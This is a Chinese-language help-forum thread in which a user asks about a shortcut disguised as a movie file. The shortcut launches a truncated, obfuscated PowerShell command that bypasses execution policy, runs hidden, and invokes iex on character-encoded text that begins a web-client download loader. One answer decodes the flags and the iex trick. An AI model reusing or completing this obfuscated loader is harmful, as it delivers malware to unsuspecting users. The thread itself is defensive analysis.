我得到了一个文件,它本应是一部电影,但结果却是执行 powershell 命令的快捷方式。详细信息如下:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.
有人能告诉我这个 powershell 命令会做什么吗,或者我可以在哪里找到如何解码它的详细信息
谢谢
答案1
powershell.exe -NoPr -WINd 1 -eXEc ByP是powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass
它尝试执行的命令$verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN''实际上iex是Invoke-Expression
我相信您错过了命令行的一部分,因此很难说出其余部分的含义。